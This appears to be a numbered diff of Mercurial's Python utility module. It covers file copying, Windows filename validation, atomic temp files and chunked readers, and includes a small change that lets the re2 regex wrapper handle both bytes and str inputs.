1929 1929 if fstype not in _hardlinkfswhitelist:
1930 1930 hardlink = False
1931 1931 if hardlink:
1932 1932 try:
1933 1933 oslink(src, dest)
1934 1934 return
1935 1935 except (IOError, OSError):
1936 1936 pass # fall back to normal copy
1937 1937 if os.path.islink(src):
1938 1938 os.symlink(os.readlink(src), dest)
1939 1939 # copytime is ignored for symlinks, but in general copytime isn't needed
1940 1940 # for them anyway
1941 1941 else:
1942 1942 try:
1943 1943 shutil.copyfile(src, dest)
1944 1944 if copystat:
1945 1945 # copystat also copies mode
1946 1946 shutil.copystat(src, dest)
1947 1947 else:
1948 1948 shutil.copymode(src, dest)
1949 1949 if oldstat and oldstat.stat:
1950 1950 newstat = filestat.frompath(dest)
1951 1951 if newstat.isambig(oldstat):
1952 1952 # stat of copied file is ambiguous to original one
1953 1953 advanced = (
1954 1954 oldstat.stat[stat.ST_MTIME] + 1
1955 1955 ) & 0x7FFFFFFF
1956 1956 os.utime(dest, (advanced, advanced))
1957 1957 except shutil.Error as inst:
1958 1958 raise error.Abort(stringutil.forcebytestr(inst))
1959 1959
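# Illustrative call (a sketch; file names are made up): copy preserving mode
# and timestamps; hardlinking is only attempted on whitelisted filesystems.
#
#     copyfile(b'src.bin', b'dst.bin', hardlink=True, copystat=True)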
1960 1960
1961 1961 def copyfiles(src, dst, hardlink=None, progress=None):
1962 1962 """Copy a directory tree using hardlinks if possible."""
1963 1963 num = 0
1964 1964
1965 1965 def settopic():
1966 1966 if progress:
1967 1967 progress.topic = _(b'linking') if hardlink else _(b'copying')
1968 1968
1969 1969 if os.path.isdir(src):
1970 1970 if hardlink is None:
1971 1971 hardlink = (
1972 1972 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1973 1973 )
1974 1974 settopic()
1975 1975 os.mkdir(dst)
1976 1976 for name, kind in listdir(src):
1977 1977 srcname = os.path.join(src, name)
1978 1978 dstname = os.path.join(dst, name)
1979 1979 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1980 1980 num += n
1981 1981 else:
1982 1982 if hardlink is None:
1983 1983 hardlink = (
1984 1984 os.stat(os.path.dirname(src)).st_dev
1985 1985 == os.stat(os.path.dirname(dst)).st_dev
1986 1986 )
1987 1987 settopic()
1988 1988
1989 1989 if hardlink:
1990 1990 try:
1991 1991 oslink(src, dst)
1992 1992 except (IOError, OSError):
1993 1993 hardlink = False
1994 1994 shutil.copy(src, dst)
1995 1995 else:
1996 1996 shutil.copy(src, dst)
1997 1997 num += 1
1998 1998 if progress:
1999 1999 progress.increment()
2000 2000
2001 2001 return hardlink, num
2002 2002
2003 2003
2004 2004 _winreservednames = {
2005 2005 b'con',
2006 2006 b'prn',
2007 2007 b'aux',
2008 2008 b'nul',
2009 2009 b'com1',
2010 2010 b'com2',
2011 2011 b'com3',
2012 2012 b'com4',
2013 2013 b'com5',
2014 2014 b'com6',
2015 2015 b'com7',
2016 2016 b'com8',
2017 2017 b'com9',
2018 2018 b'lpt1',
2019 2019 b'lpt2',
2020 2020 b'lpt3',
2021 2021 b'lpt4',
2022 2022 b'lpt5',
2023 2023 b'lpt6',
2024 2024 b'lpt7',
2025 2025 b'lpt8',
2026 2026 b'lpt9',
2027 2027 }
2028 2028 _winreservedchars = b':*?"<>|'
2029 2029
2030 2030
2031 2031 def checkwinfilename(path):
2032 2032 # type: (bytes) -> Optional[bytes]
2033 2033 r"""Check that the base-relative path is a valid filename on Windows.
2034 2034 Returns None if the path is ok, or a UI string describing the problem.
2035 2035
2036 2036 >>> checkwinfilename(b"just/a/normal/path")
2037 2037 >>> checkwinfilename(b"foo/bar/con.xml")
2038 2038 "filename contains 'con', which is reserved on Windows"
2039 2039 >>> checkwinfilename(b"foo/con.xml/bar")
2040 2040 "filename contains 'con', which is reserved on Windows"
2041 2041 >>> checkwinfilename(b"foo/bar/xml.con")
2042 2042 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2043 2043 "filename contains 'AUX', which is reserved on Windows"
2044 2044 >>> checkwinfilename(b"foo/bar/bla:.txt")
2045 2045 "filename contains ':', which is reserved on Windows"
2046 2046 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2047 2047 "filename contains '\\x07', which is invalid on Windows"
2048 2048 >>> checkwinfilename(b"foo/bar/bla ")
2049 2049 "filename ends with ' ', which is not allowed on Windows"
2050 2050 >>> checkwinfilename(b"../bar")
2051 2051 >>> checkwinfilename(b"foo\\")
2052 2052 "filename ends with '\\', which is invalid on Windows"
2053 2053 >>> checkwinfilename(b"foo\\/bar")
2054 2054 "directory name ends with '\\', which is invalid on Windows"
2055 2055 """
2056 2056 if path.endswith(b'\\'):
2057 2057 return _(b"filename ends with '\\', which is invalid on Windows")
2058 2058 if b'\\/' in path:
2059 2059 return _(b"directory name ends with '\\', which is invalid on Windows")
2060 2060 for n in path.replace(b'\\', b'/').split(b'/'):
2061 2061 if not n:
2062 2062 continue
2063 2063 for c in _filenamebytestr(n):
2064 2064 if c in _winreservedchars:
2065 2065 return (
2066 2066 _(
2067 2067 b"filename contains '%s', which is reserved "
2068 2068 b"on Windows"
2069 2069 )
2070 2070 % c
2071 2071 )
2072 2072 if ord(c) <= 31:
2073 2073 return _(
2074 2074 b"filename contains '%s', which is invalid on Windows"
2075 2075 ) % stringutil.escapestr(c)
2076 2076 base = n.split(b'.')[0]
2077 2077 if base and base.lower() in _winreservednames:
2078 2078 return (
2079 2079 _(b"filename contains '%s', which is reserved on Windows")
2080 2080 % base
2081 2081 )
2082 2082 t = n[-1:]
2083 2083 if t in b'. ' and n not in b'..':
2084 2084 return (
2085 2085 _(
2086 2086 b"filename ends with '%s', which is not allowed "
2087 2087 b"on Windows"
2088 2088 )
2089 2089 % t
2090 2090 )
2091 2091
2092 2092
2093 2093 timer = getattr(time, "perf_counter", None)
2094 2094
2095 2095 if pycompat.iswindows:
2096 2096 checkosfilename = checkwinfilename
2097 2097 if not timer:
2098 2098 timer = time.clock
2099 2099 else:
2100 2100 # mercurial.windows doesn't have platform.checkosfilename
2101 2101 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2102 2102 if not timer:
2103 2103 timer = time.time
2104 2104
2105 2105
2106 2106 def makelock(info, pathname):
2107 2107 """Create a lock file atomically if possible
2108 2108
2109 2109 This may leave a stale lock file if symlinks aren't supported and signal
2110 2110 interrupts are enabled.
2111 2111 """
2112 2112 try:
2113 2113 return os.symlink(info, pathname)
2114 2114 except OSError as why:
2115 2115 if why.errno == errno.EEXIST:
2116 2116 raise
2117 2117 except AttributeError: # no symlink in os
2118 2118 pass
2119 2119
2120 2120 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2121 2121 ld = os.open(pathname, flags)
2122 2122 os.write(ld, info)
2123 2123 os.close(ld)
2124 2124
2125 2125
2126 2126 def readlock(pathname):
2127 2127 # type: (bytes) -> bytes
2128 2128 try:
2129 2129 return readlink(pathname)
2130 2130 except OSError as why:
2131 2131 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2132 2132 raise
2133 2133 except AttributeError: # no symlink in os
2134 2134 pass
2135 2135 with posixfile(pathname, b'rb') as fp:
2136 2136 return fp.read()
2137 2137
2138 2138
2139 2139 def fstat(fp):
2140 2140 '''stat file object that may not have fileno method.'''
2141 2141 try:
2142 2142 return os.fstat(fp.fileno())
2143 2143 except AttributeError:
2144 2144 return os.stat(fp.name)
2145 2145
2146 2146
2147 2147 # File system features
2148 2148
2149 2149
2150 2150 def fscasesensitive(path):
2151 2151 # type: (bytes) -> bool
2152 2152 """
2153 2153 Return true if the given path is on a case-sensitive filesystem
2154 2154
2155 2155 Requires a path (like /foo/.hg) ending with a foldable final
2156 2156 directory component.
2157 2157 """
2158 2158 s1 = os.lstat(path)
2159 2159 d, b = os.path.split(path)
2160 2160 b2 = b.upper()
2161 2161 if b == b2:
2162 2162 b2 = b.lower()
2163 2163 if b == b2:
2164 2164 return True # no evidence against case sensitivity
2165 2165 p2 = os.path.join(d, b2)
2166 2166 try:
2167 2167 s2 = os.lstat(p2)
2168 2168 if s2 == s1:
2169 2169 return False
2170 2170 return True
2171 2171 except OSError:
2172 2172 return True
2173 2173
2174 2174
2175 _re2_input = lambda x: x
2175 2176 try:
2176 2177 import re2 # pytype: disable=import-error
2177 2178
2178 2179 _re2 = None
2179 2180 except ImportError:
2180 2181 _re2 = False
2181 2182
2182 2183
2183 2184 class _re(object):
2184 2185 def _checkre2(self):
2185 2186 global _re2
2187 global _re2_input
2186 2188 try:
2187 2189 # check if match works, see issue3964
2188 _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]'))
2190 check_pattern = br'\[([^\[]+)\]'
2191 check_input = b'[ui]'
2192 _re2 = bool(re2.match(check_pattern, check_input))
2189 2193 except ImportError:
2190 2194 _re2 = False
2195 except TypeError:
2196 # the `pyre-2` project provides a re2 module that accepts bytes
2197 # the `fb-re2` project provides a re2 module that accepts sysstr
2198 check_pattern = pycompat.sysstr(check_pattern)
2199 check_input = pycompat.sysstr(check_input)
2200 _re2 = bool(re2.match(check_pattern, check_input))
2201 _re2_input = pycompat.sysstr
2191 2202
2192 2203 def compile(self, pat, flags=0):
2193 2204 """Compile a regular expression, using re2 if possible
2194 2205
2195 2206 For best performance, use only re2-compatible regexp features. The
2196 2207 only flags from the re module that are re2-compatible are
2197 2208 IGNORECASE and MULTILINE."""
2198 2209 if _re2 is None:
2199 2210 self._checkre2()
2200 2211 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2201 2212 if flags & remod.IGNORECASE:
2202 2213 pat = b'(?i)' + pat
2203 2214 if flags & remod.MULTILINE:
2204 2215 pat = b'(?m)' + pat
2205 2216 try:
2206 return re2.compile(pat)
2217 return re2.compile(_re2_input(pat))
2207 2218 except re2.error:
2208 2219 pass
2209 2220 return remod.compile(pat, flags)
2210 2221
2211 2222 @propertycache
2212 2223 def escape(self):
2213 2224 """Return the version of escape corresponding to self.compile.
2214 2225
2215 2226 This is imperfect because whether re2 or re is used for a particular
2216 2227 function depends on the flags, etc, but it's the best we can do.
2217 2228 """
2218 2229 global _re2
2219 2230 if _re2 is None:
2220 2231 self._checkre2()
2221 2232 if _re2:
2222 2233 return re2.escape
2223 2234 else:
2224 2235 return remod.escape
2225 2236
2226 2237
2227 2238 re = _re()
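
# Illustrative usage (a sketch): callers treat this singleton like a regexp
# module; re2 is tried first and the stdlib engine is the fallback.
#
#     pat = re.compile(br'^[0-9]+$', remod.IGNORECASE)
#     pat.match(b'42')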
2228 2239
2229 2240 _fspathcache = {}
2230 2241
2231 2242
2232 2243 def fspath(name, root):
2233 2244 # type: (bytes, bytes) -> bytes
2234 2245 """Get name in the case stored in the filesystem
2235 2246
2236 2247 The name should be relative to root, and be normcase-ed for efficiency.
2237 2248
2238 2249 Note that this function is unnecessary, and should not be
2239 2250 called, for case-sensitive filesystems (simply because it's expensive).
2240 2251
2241 2252 The root should be normcase-ed, too.
2242 2253 """
2243 2254
2244 2255 def _makefspathcacheentry(dir):
2245 2256 return {normcase(n): n for n in os.listdir(dir)}
2246 2257
2247 2258 seps = pycompat.ossep
2248 2259 if pycompat.osaltsep:
2249 2260 seps = seps + pycompat.osaltsep
2250 2261 # Protect backslashes. This gets silly very quickly.
2251 2262 seps.replace(b'\\', b'\\\\')
2252 2263 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2253 2264 dir = os.path.normpath(root)
2254 2265 result = []
2255 2266 for part, sep in pattern.findall(name):
2256 2267 if sep:
2257 2268 result.append(sep)
2258 2269 continue
2259 2270
2260 2271 if dir not in _fspathcache:
2261 2272 _fspathcache[dir] = _makefspathcacheentry(dir)
2262 2273 contents = _fspathcache[dir]
2263 2274
2264 2275 found = contents.get(part)
2265 2276 if not found:
2266 2277 # retry "once per directory" per "dirstate.walk", which
2267 2278 # may take place for each patch of "hg qpush", for example
2268 2279 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2269 2280 found = contents.get(part)
2270 2281
2271 2282 result.append(found or part)
2272 2283 dir = os.path.join(dir, part)
2273 2284
2274 2285 return b''.join(result)
2275 2286
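# For example, on a case-insensitive filesystem that stores `Foo/Bar.txt`
# (a sketch; both arguments must already be normcase-ed):
#
#     fspath(b'foo/bar.txt', b'/repo')   # -> b'Foo/Bar.txt'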
2276 2287
2277 2288 def checknlink(testfile):
2278 2289 # type: (bytes) -> bool
2279 2290 '''check whether hardlink count reporting works properly'''
2280 2291
2281 2292 # testfile may be open, so we need a separate file for checking to
2282 2293 # work around issue2543 (or testfile may get lost on Samba shares)
2283 2294 f1, f2, fp = None, None, None
2284 2295 try:
2285 2296 fd, f1 = pycompat.mkstemp(
2286 2297 prefix=b'.%s-' % os.path.basename(testfile),
2287 2298 suffix=b'1~',
2288 2299 dir=os.path.dirname(testfile),
2289 2300 )
2290 2301 os.close(fd)
2291 2302 f2 = b'%s2~' % f1[:-2]
2292 2303
2293 2304 oslink(f1, f2)
2294 2305 # nlinks() may behave differently for files on Windows shares if
2295 2306 # the file is open.
2296 2307 fp = posixfile(f2)
2297 2308 return nlinks(f2) > 1
2298 2309 except OSError:
2299 2310 return False
2300 2311 finally:
2301 2312 if fp is not None:
2302 2313 fp.close()
2303 2314 for f in (f1, f2):
2304 2315 try:
2305 2316 if f is not None:
2306 2317 os.unlink(f)
2307 2318 except OSError:
2308 2319 pass
2309 2320
2310 2321
2311 2322 def endswithsep(path):
2312 2323 # type: (bytes) -> bool
2313 2324 '''Check path ends with os.sep or os.altsep.'''
2314 2325 return bool( # help pytype
2315 2326 path.endswith(pycompat.ossep)
2316 2327 or pycompat.osaltsep
2317 2328 and path.endswith(pycompat.osaltsep)
2318 2329 )
2319 2330
2320 2331
2321 2332 def splitpath(path):
2322 2333 # type: (bytes) -> List[bytes]
2323 2334 """Split path by os.sep.
2324 2335 Note that this function does not use os.altsep because this is
2325 2336 an alternative to a simple "xxx.split(os.sep)".
2326 2337 It is recommended to use os.path.normpath() before using this
2327 2338 function if needed."""
2328 2339 return path.split(pycompat.ossep)
2329 2340
2330 2341
2331 2342 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2332 2343 """Create a temporary file with the same contents from name
2333 2344
2334 2345 The permission bits are copied from the original file.
2335 2346
2336 2347 If the temporary file is going to be truncated immediately, you
2337 2348 can use emptyok=True as an optimization.
2338 2349
2339 2350 Returns the name of the temporary file.
2340 2351 """
2341 2352 d, fn = os.path.split(name)
2342 2353 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2343 2354 os.close(fd)
2344 2355 # Temporary files are created with mode 0600, which is usually not
2345 2356 # what we want. If the original file already exists, just copy
2346 2357 # its mode. Otherwise, manually obey umask.
2347 2358 copymode(name, temp, createmode, enforcewritable)
2348 2359
2349 2360 if emptyok:
2350 2361 return temp
2351 2362 try:
2352 2363 try:
2353 2364 ifp = posixfile(name, b"rb")
2354 2365 except IOError as inst:
2355 2366 if inst.errno == errno.ENOENT:
2356 2367 return temp
2357 2368 if not getattr(inst, 'filename', None):
2358 2369 inst.filename = name
2359 2370 raise
2360 2371 ofp = posixfile(temp, b"wb")
2361 2372 for chunk in filechunkiter(ifp):
2362 2373 ofp.write(chunk)
2363 2374 ifp.close()
2364 2375 ofp.close()
2365 2376 except: # re-raises
2366 2377 try:
2367 2378 os.unlink(temp)
2368 2379 except OSError:
2369 2380 pass
2370 2381 raise
2371 2382 return temp
2372 2383
2373 2384
2374 2385 class filestat(object):
2375 2386 """help to exactly detect change of a file
2376 2387
2377 2388 The 'stat' attribute is the result of 'os.stat()' if the specified
2378 2389 'path' exists. Otherwise, it is None. This avoids a preparatory
2379 2390 'exists()' check on the caller's side.
2380 2391 """
2381 2392
2382 2393 def __init__(self, stat):
2383 2394 self.stat = stat
2384 2395
2385 2396 @classmethod
2386 2397 def frompath(cls, path):
2387 2398 try:
2388 2399 stat = os.stat(path)
2389 2400 except OSError as err:
2390 2401 if err.errno != errno.ENOENT:
2391 2402 raise
2392 2403 stat = None
2393 2404 return cls(stat)
2394 2405
2395 2406 @classmethod
2396 2407 def fromfp(cls, fp):
2397 2408 stat = os.fstat(fp.fileno())
2398 2409 return cls(stat)
2399 2410
2400 2411 __hash__ = object.__hash__
2401 2412
2402 2413 def __eq__(self, old):
2403 2414 try:
2404 2415 # if ambiguity between stat of new and old file is
2405 2416 # avoided, comparison of size, ctime and mtime is enough
2406 2417 # to exactly detect change of a file regardless of platform
2407 2418 return (
2408 2419 self.stat.st_size == old.stat.st_size
2409 2420 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2410 2421 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2411 2422 )
2412 2423 except AttributeError:
2413 2424 pass
2414 2425 try:
2415 2426 return self.stat is None and old.stat is None
2416 2427 except AttributeError:
2417 2428 return False
2418 2429
2419 2430 def isambig(self, old):
2420 2431 """Examine whether new (= self) stat is ambiguous against old one
2421 2432
2422 2433 "S[N]" below means stat of a file at N-th change:
2423 2434
2424 2435 - S[n-1].ctime < S[n].ctime: can detect change of a file
2425 2436 - S[n-1].ctime == S[n].ctime
2426 2437 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2427 2438 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2428 2439 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2429 2440 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2430 2441
2431 2442 Case (*2) above means that a file was changed twice or more within
2432 2443 the same second (= S[n-1].ctime), and comparison of timestamps
2433 2444 is ambiguous.
2434 2445
2435 2446 The basic idea to avoid such ambiguity is "advance mtime by 1 sec,
2436 2447 if the timestamp is ambiguous".
2437 2448
2438 2449 But advancing mtime only in case (*2) doesn't work as
2439 2450 expected, because naturally advanced S[n].mtime in case (*1)
2440 2451 might be equal to manually advanced S[n-1 or earlier].mtime.
2441 2452
2442 2453 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2443 2454 treated as ambiguous regardless of mtime, to avoid being fooled
2444 2455 by collisions between such mtimes.
2445 2456
2446 2457 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2447 2458 S[n].mtime", even if size of a file isn't changed.
2448 2459 """
2449 2460 try:
2450 2461 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2451 2462 except AttributeError:
2452 2463 return False
2453 2464
2454 2465 def avoidambig(self, path, old):
2455 2466 """Change file stat of specified path to avoid ambiguity
2456 2467
2457 2468 'old' should be previous filestat of 'path'.
2458 2469
2459 2470 This skips avoiding ambiguity, if a process doesn't have
2460 2471 appropriate privileges for 'path'. This returns False in this
2461 2472 case.
2462 2473
2463 2474 Otherwise, this returns True, as "ambiguity is avoided".
2464 2475 """
2465 2476 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2466 2477 try:
2467 2478 os.utime(path, (advanced, advanced))
2468 2479 except OSError as inst:
2469 2480 if inst.errno == errno.EPERM:
2470 2481 # utime() on the file created by another user causes EPERM,
2471 2482 # if a process doesn't have appropriate privileges
2472 2483 return False
2473 2484 raise
2474 2485 return True
2475 2486
2476 2487 def __ne__(self, other):
2477 2488 return not self == other
2478 2489
2479 2490
2480 2491 class atomictempfile(object):
2481 2492 """writable file object that atomically updates a file
2482 2493
2483 2494 All writes will go to a temporary copy of the original file. Call
2484 2495 close() when you are done writing, and atomictempfile will rename
2485 2496 the temporary copy to the original name, making the changes
2486 2497 visible. If the object is destroyed without being closed, all your
2487 2498 writes are discarded.
2488 2499
2489 2500 checkambig argument of constructor is used with filestat, and is
2490 2501 useful only if target file is guarded by any lock (e.g. repo.lock
2491 2502 or repo.wlock).
2492 2503 """
2493 2504
2494 2505 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2495 2506 self.__name = name # permanent name
2496 2507 self._tempname = mktempcopy(
2497 2508 name,
2498 2509 emptyok=(b'w' in mode),
2499 2510 createmode=createmode,
2500 2511 enforcewritable=(b'w' in mode),
2501 2512 )
2502 2513
2503 2514 self._fp = posixfile(self._tempname, mode)
2504 2515 self._checkambig = checkambig
2505 2516
2506 2517 # delegated methods
2507 2518 self.read = self._fp.read
2508 2519 self.write = self._fp.write
2509 2520 self.seek = self._fp.seek
2510 2521 self.tell = self._fp.tell
2511 2522 self.fileno = self._fp.fileno
2512 2523
2513 2524 def close(self):
2514 2525 if not self._fp.closed:
2515 2526 self._fp.close()
2516 2527 filename = localpath(self.__name)
2517 2528 oldstat = self._checkambig and filestat.frompath(filename)
2518 2529 if oldstat and oldstat.stat:
2519 2530 rename(self._tempname, filename)
2520 2531 newstat = filestat.frompath(filename)
2521 2532 if newstat.isambig(oldstat):
2522 2533 # stat of changed file is ambiguous to original one
2523 2534 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2524 2535 os.utime(filename, (advanced, advanced))
2525 2536 else:
2526 2537 rename(self._tempname, filename)
2527 2538
2528 2539 def discard(self):
2529 2540 if not self._fp.closed:
2530 2541 try:
2531 2542 os.unlink(self._tempname)
2532 2543 except OSError:
2533 2544 pass
2534 2545 self._fp.close()
2535 2546
2536 2547 def __del__(self):
2537 2548 if safehasattr(self, '_fp'): # constructor actually did something
2538 2549 self.discard()
2539 2550
2540 2551 def __enter__(self):
2541 2552 return self
2542 2553
2543 2554 def __exit__(self, exctype, excvalue, traceback):
2544 2555 if exctype is not None:
2545 2556 self.discard()
2546 2557 else:
2547 2558 self.close()
2548 2559
2549 2560
2550 2561 def unlinkpath(f, ignoremissing=False, rmdir=True):
2551 2562 # type: (bytes, bool, bool) -> None
2552 2563 """unlink and remove the directory if it is empty"""
2553 2564 if ignoremissing:
2554 2565 tryunlink(f)
2555 2566 else:
2556 2567 unlink(f)
2557 2568 if rmdir:
2558 2569 # try removing directories that might now be empty
2559 2570 try:
2560 2571 removedirs(os.path.dirname(f))
2561 2572 except OSError:
2562 2573 pass
2563 2574
2564 2575
2565 2576 def tryunlink(f):
2566 2577 # type: (bytes) -> None
2567 2578 """Attempt to remove a file, ignoring ENOENT errors."""
2568 2579 try:
2569 2580 unlink(f)
2570 2581 except OSError as e:
2571 2582 if e.errno != errno.ENOENT:
2572 2583 raise
2573 2584
2574 2585
2575 2586 def makedirs(name, mode=None, notindexed=False):
2576 2587 # type: (bytes, Optional[int], bool) -> None
2577 2588 """recursive directory creation with parent mode inheritance
2578 2589
2579 2590 Newly created directories are marked as "not to be indexed by
2580 2591 the content indexing service", if ``notindexed`` is specified
2581 2592 for "write" mode access.
2582 2593 """
2583 2594 try:
2584 2595 makedir(name, notindexed)
2585 2596 except OSError as err:
2586 2597 if err.errno == errno.EEXIST:
2587 2598 return
2588 2599 if err.errno != errno.ENOENT or not name:
2589 2600 raise
2590 2601 parent = os.path.dirname(os.path.abspath(name))
2591 2602 if parent == name:
2592 2603 raise
2593 2604 makedirs(parent, mode, notindexed)
2594 2605 try:
2595 2606 makedir(name, notindexed)
2596 2607 except OSError as err:
2597 2608 # Catch EEXIST to handle races
2598 2609 if err.errno == errno.EEXIST:
2599 2610 return
2600 2611 raise
2601 2612 if mode is not None:
2602 2613 os.chmod(name, mode)
2603 2614
2604 2615
2605 2616 def readfile(path):
2606 2617 # type: (bytes) -> bytes
2607 2618 with open(path, b'rb') as fp:
2608 2619 return fp.read()
2609 2620
2610 2621
2611 2622 def writefile(path, text):
2612 2623 # type: (bytes, bytes) -> None
2613 2624 with open(path, b'wb') as fp:
2614 2625 fp.write(text)
2615 2626
2616 2627
2617 2628 def appendfile(path, text):
2618 2629 # type: (bytes, bytes) -> None
2619 2630 with open(path, b'ab') as fp:
2620 2631 fp.write(text)
2621 2632
2622 2633
2623 2634 class chunkbuffer(object):
2624 2635 """Allow arbitrary sized chunks of data to be efficiently read from an
2625 2636 iterator over chunks of arbitrary size."""
2626 2637
2627 2638 def __init__(self, in_iter):
2628 2639 """in_iter is the iterator that's iterating over the input chunks."""
2629 2640
2630 2641 def splitbig(chunks):
2631 2642 for chunk in chunks:
2632 2643 if len(chunk) > 2 ** 20:
2633 2644 pos = 0
2634 2645 while pos < len(chunk):
2635 2646 end = pos + 2 ** 18
2636 2647 yield chunk[pos:end]
2637 2648 pos = end
2638 2649 else:
2639 2650 yield chunk
2640 2651
2641 2652 self.iter = splitbig(in_iter)
2642 2653 self._queue = collections.deque()
2643 2654 self._chunkoffset = 0
2644 2655
2645 2656 def read(self, l=None):
2646 2657 """Read L bytes of data from the iterator of chunks of data.
2647 2658 Returns less than L bytes if the iterator runs dry.
2648 2659
2649 2660 If the size parameter is omitted, read everything."""
2650 2661 if l is None:
2651 2662 return b''.join(self.iter)
2652 2663
2653 2664 left = l
2654 2665 buf = []
2655 2666 queue = self._queue
2656 2667 while left > 0:
2657 2668 # refill the queue
2658 2669 if not queue:
2659 2670 target = 2 ** 18
2660 2671 for chunk in self.iter:
2661 2672 queue.append(chunk)
2662 2673 target -= len(chunk)
2663 2674 if target <= 0:
2664 2675 break
2665 2676 if not queue:
2666 2677 break
2667 2678
2668 2679 # The easy way to do this would be to queue.popleft(), modify the
2669 2680 # chunk (if necessary), then queue.appendleft(). However, for cases
2670 2681 # where we read partial chunk content, this incurs 2 dequeue
2671 2682 # mutations and creates a new str for the remaining chunk in the
2672 2683 # queue. Our code below avoids this overhead.
2673 2684
2674 2685 chunk = queue[0]
2675 2686 chunkl = len(chunk)
2676 2687 offset = self._chunkoffset
2677 2688
2678 2689 # Use full chunk.
2679 2690 if offset == 0 and left >= chunkl:
2680 2691 left -= chunkl
2681 2692 queue.popleft()
2682 2693 buf.append(chunk)
2683 2694 # self._chunkoffset remains at 0.
2684 2695 continue
2685 2696
2686 2697 chunkremaining = chunkl - offset
2687 2698
2688 2699 # Use all of unconsumed part of chunk.
2689 2700 if left >= chunkremaining:
2690 2701 left -= chunkremaining
2691 2702 queue.popleft()
2692 2703 # offset == 0 is enabled by block above, so this won't merely
2693 2704 # copy via ``chunk[0:]``.
2694 2705 buf.append(chunk[offset:])
2695 2706 self._chunkoffset = 0
2696 2707
2697 2708 # Partial chunk needed.
2698 2709 else:
2699 2710 buf.append(chunk[offset : offset + left])
2700 2711 self._chunkoffset += left
2701 2712 left -= chunkremaining
2702 2713
2703 2714 return b''.join(buf)
2704 2715
2705 2716
2706 2717 def filechunkiter(f, size=131072, limit=None):
2707 2718 """Create a generator that produces the data in the file size
2708 2719 (default 131072) bytes at a time, up to optional limit (default is
2709 2720 to read all data). Chunks may be less than size bytes if the
2710 2721 chunk is the last chunk in the file, or the file is a socket or
2711 2722 some other type of file that sometimes reads less data than is
2712 2723 requested."""
2713 2724 assert size >= 0
2714 2725 assert limit is None or limit >= 0
2715 2726 while True:
2716 2727 if limit is None:
2717 2728 nbytes = size
2718 2729 else:
2719 2730 nbytes = min(limit, size)
2720 2731 s = nbytes and f.read(nbytes)
2721 2732 if not s:
2722 2733 break
2723 2734 if limit:
2724 2735 limit -= len(s)
2725 2736 yield s
2726 2737
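# Illustrative usage (a sketch; `consume` is a made-up callback): stream at
# most one megabyte of a file in 64k chunks.
#
#     with open(b'data.bin', b'rb') as fp:
#         for chunk in filechunkiter(fp, size=65536, limit=2 ** 20):
#             consume(chunk)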
2727 2738
2728 2739 class cappedreader(object):
2729 2740 """A file object proxy that allows reading up to N bytes.
2730 2741
2731 2742 Given a source file object, instances of this type allow reading up to
2732 2743 N bytes from that source file object. Attempts to read past the allowed
2733 2744 limit are treated as EOF.
2734 2745
2735 2746 It is assumed that I/O is not performed on the original file object
2736 2747 in addition to I/O that is performed by this instance. If there is,
2737 2748 state tracking will get out of sync and unexpected results will ensue.
2738 2749 """
2739 2750
2740 2751 def __init__(self, fh, limit):
2741 2752 """Allow reading up to <limit> bytes from <fh>."""
2742 2753 self._fh = fh
2743 2754 self._left = limit
2744 2755
2745 2756 def read(self, n=-1):
2746 2757 if not self._left:
2747 2758 return b''
2748 2759
2749 2760 if n < 0:
2750 2761 n = self._left
2751 2762
2752 2763 data = self._fh.read(min(n, self._left))
2753 2764 self._left -= len(data)
2754 2765 assert self._left >= 0
2755 2766
2756 2767 return data
2757 2768
2758 2769 def readinto(self, b):
2759 2770 res = self.read(len(b))
2760 2771 if res is None:
2761 2772 return None
2762 2773
2763 2774 b[0 : len(res)] = res
2764 2775 return len(res)
2765 2776
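# Illustrative usage (a sketch; `fh` is any readable file object): cap reads
# at 100 bytes, after which the reader reports EOF.
#
#     reader = cappedreader(fh, 100)
#     data = reader.read()   # at most 100 bytes
#     reader.read()          # b'' once the limit is consumed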
2766 2777
2767 2778 def unitcountfn(*unittable):
2768 2779 '''return a function that renders a readable count of some quantity'''
2769 2780
2770 2781 def go(count):
2771 2782 for multiplier, divisor, format in unittable:
2772 2783 if abs(count) >= divisor * multiplier:
2773 2784 return format % (count / float(divisor))
2774 2785 return unittable[-1][2] % count
2775 2786
2776 2787 return go
2777 2788
2778 2789
2779 2790 def processlinerange(fromline, toline):
2780 2791 # type: (int, int) -> Tuple[int, int]
2781 2792 """Check that linerange <fromline>:<toline> makes sense and return a
2782 2793 0-based range.
2783 2794
2784 2795 >>> processlinerange(10, 20)
2785 2796 (9, 20)
2786 2797 >>> processlinerange(2, 1)
2787 2798 Traceback (most recent call last):
2788 2799 ...
2789 2800 ParseError: line range must be positive
2790 2801 >>> processlinerange(0, 5)
2791 2802 Traceback (most recent call last):
2792 2803 ...
2793 2804 ParseError: fromline must be strictly positive
2794 2805 """
2795 2806 if toline - fromline < 0:
2796 2807 raise error.ParseError(_(b"line range must be positive"))
2797 2808 if fromline < 1:
2798 2809 raise error.ParseError(_(b"fromline must be strictly positive"))
2799 2810 return fromline - 1, toline
2800 2811
2801 2812
